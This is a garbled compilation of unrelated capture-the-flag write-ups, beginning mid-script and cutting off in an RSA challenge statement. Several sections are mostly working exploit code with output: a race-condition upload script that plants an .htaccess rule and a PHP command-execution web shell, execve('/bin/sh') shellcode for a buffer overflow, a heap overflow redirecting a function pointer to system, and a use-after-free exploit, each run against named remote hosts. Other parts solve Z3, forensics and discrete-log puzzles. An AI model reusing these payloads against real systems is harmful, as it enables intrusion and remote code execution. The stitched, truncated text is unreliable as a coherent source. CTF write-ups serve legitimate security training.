flag[8]==13217)add_eq(flag[32]+flag[22]*flag[13]-flag[11]+flag[33]==3455)add_eq(flag[30]-flag[17]+flag[33]-flag[22]==76)add_eq(flag[15]+flag[21]^flag[34]*flag[32]==4675)add_eq(flag[12]-flag[23]*flag[11]==-12665)add_eq(flag[34]-flag[7]*flag[20]+flag[9]*flag[30]==-3439)add_eq(flag[20]*flag[1]-flag[4]+flag[18]==9077)add_eq(flag[17]+flag[19]*flag[36]==3527)add_eq(flag[22]^flag[15]*flag[18]==9155)add_eq(flag[6]^flag[15]*flag[12]==10949)add_eq(flag[15]*flag[20]+flag[5]-flag[24]==9213)add_eq(flag[6]+flag[7]*flag[15]-flag[19]==12880)add_eq(flag[7]+flag[17]-flag[1]*flag[13]+flag[15]==-7202)add_eq(flag[13]-flag[17]+flag[12]^flag[22]==113)add_eq(flag[15]+flag[24]^flag[7]-flag[28]==-216)add_eq(flag[5]^flag[17]-flag[33]==-125)add_eq(flag[12]^flag[18]*flag[6]==8415)add_eq(flag[5]^flag[33]+flag[22]==239)add_eq(flag[4]^flag[8]-flag[2]*flag[30]+flag[5]==-11325)add_eq(flag[20]*flag[34]+flag[12]==4015)add_eq(flag[30]^flag[18]-flag[19]+flag[6]==34)add_eq(flag[30]*flag[8]+flag[9]*flag[17]==12084)add_eq(flag[30]-flag[20]*flag[19]^flag[6]==-8294)add_eq(flag[5]-flag[34]*flag[12]==-4543)add_eq(flag[22]-flag[2]^flag[21]-flag[7]==33)add_eq(flag[18]*flag[34]-flag[8]+flag[21]*flag[6]==13734)add_eq(flag[2]-flag[34]^flag[21]+flag[8]==149)add_eq(flag[6]-flag[36]*flag[12]==-3031)add_eq(flag[15]*flag[30]-flag[12]==13015)add_eq(flag[17]+flag[4]*flag[12]==11780)add_eq(flag[30]-flag[18]*flag[1]==-9006)add_eq(flag[36]*flag[12]-flag[1]==3021)add_eq(flag[15]^flag[18]-flag[1]^flag[5]*flag[8]==-7347)add_eq(flag[18]^flag[9]-flag[36]==95)add_eq(flag[18]+flag[22]*flag[4]^flag[36]==6384)add_eq(flag[33]^flag[15]+flag[7]-flag[34]+flag[8]==152)add_eq(flag[1]*flag[33]+flag[22]*flag[17]==17157)add_eq(flag[17]^flag[1]-flag[2]==82)add_eq(flag[17]^flag[33]-flag[18]==67)add_eq(flag[1]*flag[15]-flag[17]==13015)add_eq(flag[34]-flag[2]^flag[22]+flag[18]==-177)add_eq(flag[1]+flag[2]*flag[33]==11022)add_eq(flag[2]==101) i = 0start_time = time.time()if s.check() == sat: # https://stackoverflow.com/questions/13395391/z3-finding-all-satisfying-models founded = prepare_founded_values() # return founded values as array print ''.join( chr(j) for j in founded ) # print flag as string iterate_all() # prepare to next iteration, anticollision i += 1print('--- %.2f second(s) && %d answer(s) ---' % ((time.time() - start_time), i) )```Running the script should output the flag. ```$ python2 check.py crew{phpB0lt_B3sT_PhP_3nc0d3r_r3al1y!?}--- 0.02 second(s) && 1 answer(s) ---``` # Uploadz (Web) I think this site safe from upload file, prove me wrong please. Uploadz was a decent web challenge, with a source code provided with it, meaning guessing/bruteforcing aren't part of the challenge. ```php <form action="/" method="post" enctype="multipart/form-data">Select image to upload: <input type="file" name="uploadedFile" id="fileToUpload"> <input type="submit" value="Upload Image" name="submit"> </form>``` A simple static analysis against the code shows that there's room for a race condition, since our file is being uploaded as is on the temp folder, it then takes one second for us to access the file, it's being deleted using **unlink** afterwards. To tackle this, we obviously need a script, then its all a matter of planning a successful attack to achieve an RCE. One problem I've had was that PHP wasn't executable, so I decided to a upload two files:1- an .htaccess file that allows as to execute php code with another exension (jpg).2- upload a JPG file that has a php code (a one liner cmd in this case). ```pythonimport requestsimport reimport urllib3import threadingimport timeimport sys urllib3.disable_warnings()file = ".htaccess"file2 = "test.jpg"path = "storage/app/temp/"files = { 'uploadedFile': (file, "AddType application/x-httpd-php .jpg", 'text/plain')}files2 = { 'uploadedFile': (file2, """"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>""", 'text/plain')}values = {'submit': 'Upload Image'}url = "https://uploadz-web.crewctf-2022.crewc.tf/" def performReqs(uploadedFile): r = requests.post(url, files=uploadedFile,proxies={"https":"http://127.0.0.1:1337"},verify=False,data=values) filename = re.search("your file in (.*)<",r.text) cmd = sys.argv[1] t1 = threading.Thread(target=performReqs, args=(files,)) t2 = threading.Thread(target=performReqs, args=(files2,)) t2.start()t1.start() r2 = requests.get(url+path+"test.jpg?cmd={}".format(cmd), verify=False,proxies={"https":"http://127.0.0.1:1337"})print(r2.text)``` Running the script should provide the flag. ```$ python3 slv.py "cat /flag.txt"crewctf{upload_rce_via_race}``` # Wiznu (PWN) Winzu was an easy binary exploitation challenge, however, there were limitations to use certain functions using **seccomp**, NX is disabled, so we can inject shellcode. ```Cint init(EVP_PKEY_CTX *ctx) { int iVar1; undefined8 uVar2; uVar2 = seccomp_init(0); seccomp_rule_add(uVar2,0x7fff0000,2,0); seccomp_rule_add(uVar2,0x7fff0000,0,0); seccomp_rule_add(uVar2,0x7fff0000,1,0); iVar1 = seccomp_load(uVar2); return iVar1;}```I validated using seccomp-tools.```└─# seccomp-tools dump ./chall1 130 ⨯ line CODE JT JF K================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x07 0xc000003e if (A != ARCH_X86_64) goto 0009 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x04 0xffffffff if (A != 0xffffffff) goto 0009 0005: 0x15 0x02 0x00 0x00000000 if (A == read) goto 0008 0006: 0x15 0x01 0x00 0x00000001 if (A == write) goto 0008 0007: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0009 0008: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0009: 0x06 0x00 0x00 0x00000000 return KILL``` Finally, I came up with a script that uses a custom shellcode to read the flag. ```python from pwn import * binary = context.binary = ELF('./chall1') # Allows you to switch between local/GDB/remote from terminaldef start(argv=[], *a, **kw): if args.GDB: # Set GDBscript below return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) elif args.REMOTE: # ('server', 'port') return remote(sys.argv[1], sys.argv[2], *a, **kw) else: # Run locally return process([exe] + argv, *a, **kw)def find_ip(payload): p = process(exe) p.sendline(payload) # Cyclic pattern # Wait for the process to crash p.wait() # Print out the address of EIP/RIP at the time of crashing # ip_offset = cyclic_find(p.corefile.pc) # x86 ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64 info('located EIP/RIP offset at {a}'.format(a=ip_offset)) return ip_offset# Specify your GDB script here for debugginggdbscript = '''init-pwndbgcontinue'''.format(**locals())# Set up pwntools for the correct architectureexe = './chall1'# This will automatically get context arch, bits, os etcelf = context.binary = ELF(exe, checksec=False)# Enable verbose logging so we can see exactly what is being sent (info/debug)context.log_level = 'debug' # ===========================================================# EXPLOIT GOES HERE# =========================================================== # Pass in pattern_size, get back EIP/RIP offsetoffset = find_ip(cyclic(500))context.arch = 'amd64'shellcode = asm( shellcraft.pushstr( "/home/ctf/flag" ) + shellcraft.open( 'rsp' , 0 , 0 ) + shellcraft.read( 'rax' , 'rsp' , 0x100 ) + shellcraft.write( 1 , 'rsp' , 0x100 ))# Start program#io = start()io = remote("wiznu.crewctf-2022.crewc.tf",1337)io.recvuntil('Special Gift for Special Person : ')_ = io.recvline().strip()stack = int(_,16)log.info('stack: ' + hex(stack))# Pad shellcode with NOPs until we get to return addresspadding = b'\x90' * (offset - len(shellcode)) # Build the payloadpayload = flat([ shellcode, padding, stack])io.sendline(payload)io.interactive()``` Running the script outputs the contents of /home/ctf/flag.```bash> [DEBUG] Received 0x100 bytes: 00000000 63 72 65 77 7b 4f 52 57 5f 63 6f 6d 65 5f 74 6f │crew│{ORW│_com│e_to│ 00000010 5f 74 68 65 5f 72 65 73 63 75 65 5f 73 74 34 72 │_the│_res│cue_│st4r│ 00000020 6e 5f 68 33 72 33 21 7d 30 0a 81 ed df 55 00 00 │n_h3│r3!}│0···│·U··│ 00000030 b0 0a 81 ed df 55 00 00 15 4e b7 59 0e 2d 8f db │····│·U··│·N·Y│·-··│ 00000040 40 08 81 ed df 55 00 00 60 fe 21 0c fe 7f 00 00 │@···│·U··│`·!·│····│ 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000060 15 4e b7 a2 4d 35 73 24 15 4e 79 39 48 05 a4 25 │·N··│M5s$│·Ny9│H··%│ 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000080 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 │····│····│····│····│ 00000090 68 fe 21 0c fe 7f 00 00 78 fe 21 0c fe 7f 00 00 │h·!·│····│x·!·│····│ 000000a0 90 61 45 94 15 7f 00 00 00 00 00 00 00 00 00 00 │·aE·│····│····│····│ 000000b0 00 00 00 00 00 00 00 00 40 08 81 ed df 55 00 00 │····│····│@···│·U··│ 000000c0 60 fe 21 0c fe 7f 00 00 00 00 00 00 00 00 00 00 │`·!·│····│····│····│ 000000d0 00 00 00 00 00 00 00 00 6a 08 81 ed df 55 00 00 │····│····│j···│·U··│ 000000e0 58 fe 21 0c fe 7f 00 00 1c 00 00 00 00 00 00 00 │X·!·│····│····│····│ 000000f0 01 00 00 00 00 00 00 00 d8 0f 22 0c fe 7f 00 00 │····│····│··"·│····│ 00000100crew{ORW_come_to_the_rescue_st4rn_h3r3!}0```
```import stringalphabet = string.ascii_uppercase + string.digits + "_"code = "202 137 390 235 114 369 198 110 350 396 390 383 225 258 38 291 75 324 401 142 288 397"words = code.split(" ")result = ""for word in words: result += alphabet[int(word) % 37]print(result)```
# Screenshot We are given a .ad1 File and we need to find several things inside. ## Pt. 1 The first challenge is to find the name of the secret file. The description hints that we might need to find an image.To get a better overview of the files, I extracted the .ad1 image with FTK Imager. Now that we have got the files, we can start searching for the screenshot. As Windows somehow did not find all the files, I used Linux to do this job. With the use of `find . -name '*' -exec file {} \; | grep -o -P '^.+: \w+ image' ` I filtered all the files for any kind of image file and finally found the screenshot inside of the ScreenSketch Folder, which is a tool that comes with Windows, specifically the `TempState` Folder (`AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\TempState`) The filename is `19422F1B-6C19-4190-9674-0D1C5AEC5451.png` *Click the link for images*
# ezbolt ## Bypassing Decryption I really did not feel like reversing the decryption that was laid out in the ezbolt extension. Therefore instead I added in GDB into the Docker container, built the container, then when running the container, I used GDB to break on the point at which the decrypted text was being passed to execute by PHP. This was how I dumped out the following string: ``` ``` Which realistically is a lot of bs to look through. However, if you take it apart, it is a bunch of comparisons that occur and are &&'d together. This is their "one liner" way of deciding if the input is correct against their **constraints**. Oo constraints. Fancy. Lets use Z3. ## The Script The following script was used to solve the challenge. Let's break it down. ### compare_to_constraint I am using this function to convert `$f[9]*$f[17]-$f[35]+$f[33]==4646` into `flag[9]*flag[17]-flag[35]+flag[33]==4646` which we can then use to add constraints into Z3. For those who do not know, z3 is a nice constraint solver which could let you solve multivariate problems given a well constrained problem. You may find something similar in your linear algebra class where you had to solve a system of equations using constraints set forth by the other equations. This is a similar problem; each comparison will give a constraint and at the end, the flag must adhere to all of them. So if I can convert all of these into a comparison that the Z3 solver will understand, I can compaile one big comparison chain then just ask z3 to solve it for me. ### BitVec? This is a bitvector. All that is going on here is we are creating an array of bit vectors, think of these like arrays of singular bits. You may think of a string as one array of characters. Now think of a string as an array of characters which are each an array of 8 bits. Now you are coming to what is this array of bitvectors. This object is what z3 uses to allow us to add in constraints and it to represent its solve in. We then convert this later into an actual character by doing `chr(s.model()[c].as_long())`. ```#!/usr/bin/env python3 import z3import re def compare_to_constraint(comp, flag, solver): res = int(comp.split(b"==")[1]) args = [m.start() for m in re.finditer(b"\$f", comp)] ops = [] indexes = [] for idx in args: stop = comp[idx:].find(b']') + 1 ops.append( comp[idx + stop: idx + stop + 1].decode().strip() ) indexes.append( int(comp[idx + 3: idx + stop - 1]) ) ops = ops[:-1] chall = '' ops.reverse() indexes.reverse() try: while True: chall += f'flag[{indexes.pop()}]' chall += f'{ops.pop()}' except: pass chall += f'=={res}' resp = eval(chall) solver.add(resp) s = z3.Solver() php = open('./fuscated.php', 'rb').read().split(b"&&")[2:-1]flag = []for c in range(39): flag.append(z3.BitVec(f"flag_{c}", 8)) for comp in php: con = compare_to_constraint(comp, flag, s) if s.check() == z3.sat: print( ''.join(chr(s.model()[c].as_long()) for c in flag) )else: print("Failed..")``` ## End All and all. Quite simple, but a fun and good intro example for making use of z3.
# Codechainz ```Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled``` ----- ```Hey, this is an epic memory saver. #savedBecause of COVID-19 restrictions,we can only do memory saving of programming languages.We apologize for the inconvenience. Preparing the memory space...Memory space is ready for storing data.DISCLAIMER: All your memories will be saved at 0x7efcd9390000. Here are your options. Choose one:1 Make a new memory2 View a memory3 Delete a memory4 Exit>``` The first thing we can notice is that we have a leak of the stack address\=> We can jump in that location if we have a BOF\=> But the NX is enabled, so we can't execute a shellcode in the stack So, decompile it in Ghidra: => We can notice there is a function named `init_memory`, at address `PIE BASE + 0x000011e5`, that essentially `mmap` the `memory_space` to `RWX`. ```cvoid init_memory(void) { int *piVar1; memory_space = mmap((void *)0x0,0x1e,7,0x22,-1,0); if (memory_space == (void *)0xffffffffffffffff) { perror("mmap"); fflush(stdout); piVar1 = __errno_location(); /* WARNING: Subroutine does not return */ exit(*piVar1); } return;}``` => NX mitigation is useless at this point\=> We have only to find a buffer overflow to overwrite the return address and jump into a shellcode When we add a new memory the function `input_str` is called: ```void input_str(void) { char vulnerable_buffer [44]; int i; memset(vulnerable_buffer,0,0x1e); puts("Please input a programming language of your desire. I swear i will remember it."); printf("> "); fflush(stdout); fgets(vulnerable_buffer,100,stdin); for (i = 0; i < 0x1e; i = i + 1) { memory_space[i] = vulnerable_buffer[i]; } fflush(stdin); return;}``` This function fgets 100 bytes into a buffer of 44 bytes\=> We have a BOF\=> We can use the leak given by the program to gain a shell. ```pythonfrom pwn import * exe = ELF("codechainz") context.binary = execontext.terminal = ["gnome-terminal", "-e"] def conn(): if args.LOCAL: r = process([exe.path]) gdb.attach(r) else: r = remote("51.124.222.205", 13370) return r def main(): r = conn() r.recvuntil("saved at") address = int(r.recvline(keepends=False)[3:-1], 16) payload = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05".ljust(56, b"\x90") + p64(address) r.sendline("1") r.recvuntil("remember it.") r.sendlineafter("> ", payload) r.interactive() if __name__ == "__main__": main()```
TLDR (Full writeup @ [https://www.nullhardware.com/reference/hacking-101/picoctf-2022-greatest-hits/nsa-backdoor/](https://www.nullhardware.com/reference/hacking-101/picoctf-2022-greatest-hits/nsa-backdoor/)) We need to solve $3^m = c \text{ mod n}$ for `m` given `c` & `n` (discrete logarithm). 1. Factor `n` into `p` and `q` using Pollard's p-1 algorithm (`primefac.pollard_pm1`)2. Solve for c `mod p` and `mod q` - We will solve the discrete log over `p` and `q` and use CRT to find the answer `mod n` ```python cp = c % p cq = c % q ```3. Define a simple algorithm to bruteforce a discrete logarithm (for simple problems): ```python def dlog_brute(g, h, p, pi): '''solves g^x = h (mod p) for some x, where x only takes values in the range [0, pi)''' l=[] c_power = 1 for xi in range(pi): # HERES THE BRUTE! if c_power == h: l.append(xi) c_power = c_power*mpz(g) % p # next power of g, just pow(g,xi,p) assert len(l) > 0, f"WARNING prime {p}, g={g}, h={h} has NO solutions! Error!" assert len(l) < 2, f"WARNING prime {p}, g={g}, h={h} has multiple solutions: {l}. Error!" return l[0] ```4. Define a naive form of [Pohlig-Hellman](https://en.wikipedia.org/wiki/Pohlig%E2%80%93Hellman_algorithm) - this version need not handle repeated prime factors ```python def naive_pohlig_hellman(h, p, p_factors): '''solve g^x === h mod p, when p-1 has prime factors p_factors, assumed multipliticy is 1 (ie: no repeated prime factors). Naive implementation of Pohlig-Hellman_algorithm. ''' assert len(p_factors) == len(set(p_factors)), "Repeated prime factor found. The naive form of this algorithm will not work" x=[] for pi in p_factors: gi = pow(g, (p-1)//pi, p) hi = pow(h, (p-1)//pi, p) x.append(dlog_brute(gi,hi,p,pi)) X=chinese_remainder(p_factors,x) return X ```5. The CRT implementation is as follows: ```python import math def chinese_remainder(n, x): s = 0 p = math.prod(n) for ni, xi in zip(n, x): pi = p // ni s += xi * pow(pi, -1, ni) * pi return s % p ```6. Factor `p-1` and `q-1` into their prime factorizations: ```python pm1_factors = list(primefac.primefac(p-1)) pm1_factors.sort() qm1_factors = list(primefac.primefac(q-1)) qm1_factors.sort() ```7. Observe that the prime-factor of 2 causes problems for these numbers. Both values (`0` and `1`) are equally valid solutions. We will remove the prime-factor of 2 and use the CRT manually with each of those values to generate two unique solutions `mod p` (and another two `mod q`). ```python xp = naive_pohlig_hellman(g, cp, p, pm1_factors[1:]) XP0 = chinese_remainder([(p-1)//2, 2], [xp, 0]) XP1 = chinese_remainder([(p-1)//2, 2], [xp, 1]) assert pow(g,XP0,p) == cp, "XP0 is not solution mod p!" assert pow(g,XP1,p) == cp, "XP1 is not solution mod p!" xq = naive_pohlig_hellman(g, cq, q, qm1_factors[1:]) XQ0 = chinese_remainder([(q-1)//2, 2], [xq, 0]) XQ1 = chinese_remainder([(q-1)//2, 2], [xq, 1]) assert pow(g,XQ0,q) == cq, "XQ0 is not solution mod q!" assert pow(g,XQ1,q) == cq, "XQ1 is not solution mod q!" ```8. Try all pairs, use the CRT, and see if any result in a valid solution `mod n` (the real solution will also have valid solutions `mod p` and `mod q`): ```python import itertools from binascii import unhexlify for a,b in itertools.product([XP0,XP1],[XQ0,XQ1]): s=chinese_remainder([p,q],[a,b]) if pow(g,s,n) == c: assert pow(g,s,p) == cp and pow(g,s,q) == cq, "Solution did not satisfy mod p and mod q" print(f"Found Message:\nm='{unhexlify(s.digits(16)).decode()}'") ``` Please note that there are 2 solutions `mod p` and 2 solutions `mod q`. If your discrete logarithm routine only gave you one of them, you may have just gotten lucky!
## Intro phonebook is a basic heap challenge I did during the dctf event. It's basically just a heap overflow wich allows us to overflow a function pointer with for example the address of system. ## The bug ```$ ./phonebookChoose an option: [1-5]1. Store someone's information2. Edit information3. Call someone4. Unfriend someone5. Add the hidden_note> ``` We can create an entity and then initialize: a name, a numero and a function pointer.```cint __fastcall create(unsigned int a1){ int result; // eax struct entity *s; // [rsp+18h] [rbp-8h] if ( people[a1] ) return printf("Person with id %d already exists!", a1); s = malloc(0x20uLL); s->name = get_name(); LODWORD(s->name_size) = strlen(s->name); printf("Phone number: "); fgets(s, 8, _bss_start); // phone number s->func = choose_relation(); result = s; people[a1] = s; return result;}```The bug lies `edit_name` function: ```cunsigned __int64 __fastcall edit_name(int a1){ int n; // [rsp+18h] [rbp-18h] BYREF int name_size; // [rsp+1Ch] [rbp-14h] struct entity *v4; // [rsp+20h] [rbp-10h] unsigned __int64 v5; // [rsp+28h] [rbp-8h] v5 = __readfsqword(0x28u); v4 = people[a1]; name_size = v4->name_size; printf("Name length: "); __isoc99_scanf("%d", &n); fgets(v4->name, 2, _bss_start); if ( name_size != n ) { free(v4->name); v4->name = malloc(n + 1); } printf("Name: "); fgets(v4->name, n, _bss_start); v4->name[n] = 0; return __readfsqword(0x28u) ^ v5;}``` We can give it a new lentgh and if that's not equal to the current size field it frees the current name pointer and allocates a new name pointer **without** updating the size field. Which means if we edit the name pointer with a smaller size, the name pointer will be smaller compared to the size field, then we just have to edit again the size field to make it equal to `v4->name_size` to trigger a heap overflow through the `v4->name` pointer. ## Leak libc Now we're able to overflow through the name pointer we have to find how the leak the libc, a nice way would be to leak it by using free'd chunks in the unsortedbin. Or we can leak the `entity->func` function pointer which would give us a leak of the binary base address, then we would have to edit the name pointer with the got entry of `puts` to leak its address within the libc. To do so we can create another entity right after the name pointer:```0x559b0d4d16b0 0x0000000000000000 0x0000000000000031 ........1.......0x559b0d4d16c0 0x3131313131313131 0x0000559b0c84f2a1 11111111.....U..0x559b0d4d16d0 0x0000559b0d4d1800 0x00000000000000fe ..M..U..........0x559b0d4d16e0 0x0000000000000000 0x0000000000000111 ................0x559b0d4d16f0 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1700 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1710 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1720 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1730 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1740 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1750 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1760 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1770 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1780 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d1790 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d17a0 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d17b0 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d17c0 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d17d0 0x4141414141414141 0x4141414141414141 AAAAAAAAAAAAAAAA0x559b0d4d17e0 0x4141414141414141 0x0000414141414141 AAAAAAAAAAAAAA..0x559b0d4d17f0 0x0000000000000000 0x0000000000000031 ........1.......0x559b0d4d1800 0x6161616161616161 0x6161616161616161 aaaaaaaaaaaaaaaa0x559b0d4d1810 0x6161616161616161 0x6161616161616161 aaaaaaaaaaaaaaaa0x559b0d4d1820 0x0000000000000000 0x0000000000000031 ........1.......0x559b0d4d1830 0x3131313131313131 0x0000559b0c84f2a1 11111111.....U..0x559b0d4d1840 0x0000559b0c851fa0 0x000000000000000a .....U..........0x559b0d4d1850 0x0000000000000000 0x000000000001f7b1 ................ <-- Top chunk``` The ```edit_phone_number``` overwrites the null byte:```c__int64 __fastcall edit_phone_number(int a1){ printf("Enter new phone number: "); return __isoc99_scanf("%8s", people[a1]);}``` To summarise:- leak binary base address by overwriting the null byte (`edit_phone_number`) and then print the phone numer.- leak libc base address by overwriting the name field of the second entity with the got entry of `puts` ## PROFIT Then we just have to overwrite the function pointer with the address of `system` which takes as first argument a pointer to the entity structure of edit the phone number of the entity we wanna use because that's the first field of the structure which means we make it equivalent to a `system("/bin/sh")`.```00000000 entity struc ; (sizeof=0x20, mappedto_8)00000000 num dq ?00000008 func dq ?00000010 name dq ? ; offset00000018 name_size dq ?00000020 entity ends``` Then here we are:```$ python3 exploit.py REMOTE HOST=51.124.222.205 PORT=13380[*] '/home/nasm/Documents/phonebook/chall/phonebook_patched_patched' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled RUNPATH: b'.'[+] Opening connection to 51.124.222.205 on port 13380: Done[*] binary: 0x558980fdd000[*] libc @ 0x7fabfec57000[*] system @ 0x7fabfeca92c0[*] Switching to interactive mode$ iduid=1337 gid=1337 groups=1337$ cat flag.txtDCTF{C4n_1_g3t_y0ur_numb3r?}```
The author traced a pcap file that contained TCP packets and HTTP streams. The message that caught his eye the most was one that suggested that the user had sent a POST request to the endpoint `/get/secret` endpoint content was `{"please": "false"}`. Using the cUrl tool, the author managed to form a request to which the host responded with the flag. ```curl -i -X POST -H "Content-Type: application/json" -d '{ "please": "true"}' http://maliciouspayload.delivery/get/secret```
# Original writeup [here](https://hackappatoi.github.io/ctf-sim/) This is the output of checksec over the ELF of this challenge. ```RELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x400000)``` This is a c++ challenges. There are a use after free bug in this challenge. This program is a CTF simulator, you can download challenges, solve a challenge and submit writeup for the challenges. The challenges are all struct that contain a function. Here an example of one challenge struct: ```cstruct pwn : challenges { void solve() override { cout << "You solved a pwn challenge by keysmashing and being lucky!" << endl; }};``` When we download a challenge the prigram ask us where to save it ```c challenges* downloaded [4]; void downloadChallenge() { int choice; int index; while (true) { cout << "DOWNLOAD A CHALLENGE" << endl; cout << "Choose a category" << endl; ... cout << "3. Pwn" << endl; ... cout << "> "; cin >> choice; cout << "Choose an index to save your challenge to (0-3)" << endl; cout << "> "; cin >> index; if ((choice >= 1 && choice <=5) && (index >= 0 && index <= 3)) { break; } else { cout << "Invalid category or index" << endl; } } if (choice == 1) ... else if (choice == 3) { downloaded[index] = new pwn; } ... }``` When we choose to dwnload a challenge a new struct is allocated and then its pointer is stored inside the array challenges* downloaded at the indexthat we choose. ```cvoid solveChallenge() { int index; while (true) { cout << "SOLVE A CHALLENGE" << endl; cout << "Choose one of your downloaded challenges (0-3)" << endl; cout << "> "; cin >> index; if (index >= 0 && index <= 3) { break; } } downloaded[index] -> solve(); delete downloaded[index]; }```But when we solve a challenge we execute the function solve of the struct than we free the allocate area of the struct, but the pointer remain into the downloaded[index] array. In this case this allow us to reuse the same chunk by requesting a chunk of the same size and by how the malloc work it will return the same chunk of the struct allocated before. This because since the chunk is of size 0x20 it remain into the fastbins of the heap and when we request a chunk of the same size it will return the same chunk insted to allocate another. In the binary is present also a win function that will spawn a shell for us. ```cvoid win() { system("/bin/sh");} void* win_addr = (void*) &wi;;``` We can force the binary to call this function by submitting a writeup of size 0x20 after we download and solve a challenge, and as text of the writeup we need to insert a fake structure this because in the downloaded[index] there is the pointer to the chunk of this writeup and if we place a pointer to the win function in the first 8 byte of the writeup when the program will call ```downloaded[index] -> solve();``` it will execute the function that is pointed by the pointer in the first 8 byte of the chunk. ```text0x4176c0 0x0000000000000000 0x0000000000000021 ........!.......0x4176d0 0x0000000000403d08 0x0000000000000000 [email protected] 0x0000000000000000 0x000000000000e921 ........!....... <-- Top chunk```This is the chunk and we can see he pointer to solve function 0x0000000000403d08, after we solve this challenge the heap will be arranged like this ```text0x4176c0 0x0000000000000000 0x0000000000000021 ........!.......0x4176d0 0x0000000000000417 0xfe9219cb7d3538b5 .........85}.... <-- tcachebins[0x20][0/1]0x4176e0 0x0000000000000000 0x000000000000e921 ........!....... <-- Top chunk``` and when we want to submit a writeup the heap will be like this ```textSUBMIT A WRITEUPHow long is your writeup?> 24Enter your writeup> AAAAAAAA 0x4176c0 0x0000000000000000 0x0000000000000021 ........!.......0x4176d0 0x4141414141414141 0x000000000000000a AAAAAAAA........0x4176e0 0x0000000000000000 0x000000000000e921 ........!.......```so if we insert the win function pointer in the first 8 bytes of a writeup of size 0x20 when we solve again the challenge will execute the win function this because the pointer tothis chunk in the ```challenges* downloaded [4];``` array was never nulled. This if the final solve script. ```pythonfrom pwn import *from pprint import pprint context.binary = elf = ELF('./ctf_sim')p = remote("tamuctf.com", 443, ssl=True, sni="ctf-sim") #p = elf.process()#gdb.attach(p) def download(): p.sendlineafter(b'> ', b'1') p.sendlineafter(b'> ', b'3') p.sendlineafter(b'> ', b'0') def solve(): p.sendlineafter(b'> ', b'2') p.sendlineafter(b'> ', b'0') def writeup(): p.sendlineafter(b'> ', b'3') p.sendlineafter(b'> ', b'24') chunk_fake = p64(elf.sym.win_addr)+p64(0) p.sendlineafter(b'> ', chunk_fake) download()solve()writeup()solve() p.interactive()``` and this is the output ```texteurus@node-01-00:~/Scaricati/ctf_sim$ python3 solver-template.py [*] '/home/eurus/Scaricati/ctf_sim/ctf_sim' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[+] Opening connection to tamuctf.com on port 443: Done[*] Switching to interactive mode$ lsctf_simdocker_entrypoint.shflag.txt$ cat flag.txtgigem{h34pl355_1n_53477l3}$ ```
The problem give us a statement: ```txt== proof-of-work: disabled ==n: 9099069576005010864322131238316022841221043338895736227456302636550336776171968946298044005765927235002236358603510713249831486899034262930368203212096032559091664507617383780759417104649503558521835589329751163691461155254201486010636703570864285313772976190442467858988008292898546327400223671343777884080302269 Here is RSA encrypted flag.(e=65537)7721448675656271306770207905447278771344900690929609366254539633666634639656550740458154588923683190330091584419635454991419701119568903552077272516472473602367188377791329158090763546083264422552335660922148840678536264063681459356778292303287448582918945582522946194737497041408425657842265913159282583371732459 Let's see a property of numbers... I like small numbers. pow(4, x, n) = 3x->2076118641589166085567213874123474567491402237019668147884288468645748227900602149506213192343093244218866119520289447791172877431433341258605333332347317311240605414266962400678327394383961953495485042589683815930048091844890318004699674982043472077122232159707521022410989077157770575872817558884492139975614597 pow(8, x, n) = 7x->570481792553282645867016247709264298221131860678573812616921555986238556312142113287582311278495020362100663108209217027748644136334829350490306775744918923811231372691300869181402544517366663817020095330354191043859808572829301218801816885745384781881259366872787514869251800308553996081149858726536089368839064 pow(4, x, n) = 7x->855722688829923968800524371563896447331697791017860718925382333979357834468213169931373466917742530543150994662313825541622966204502244025735460163617378385716847059036951303772103816776049995725530142995531286565789712859243951828202725328618077172821889050309181272303877700462830994121724788089804134053258596 pow(2, x, n) = 3x->4152237283178332171134427748246949134982804474039336295768576937291496455801204299012426384686186488437732239040578895582345754862866682517210666664694634622481210828533924801356654788767923906990970085179367631860096183689780636009399349964086944154244464319415042044821978154315541151745635117768984279951229194 pow(9, x, n) = 7x->1054156663532949017820446207672781543086515249287744969638214339331295245382323409940477418924969955788539945803249537876463709506856113889266213509621440928560104784495364553042394060462684347026550923448282194835059887286242632372339522130562494706847419860622125915531462963858618845383475136682837714340274340 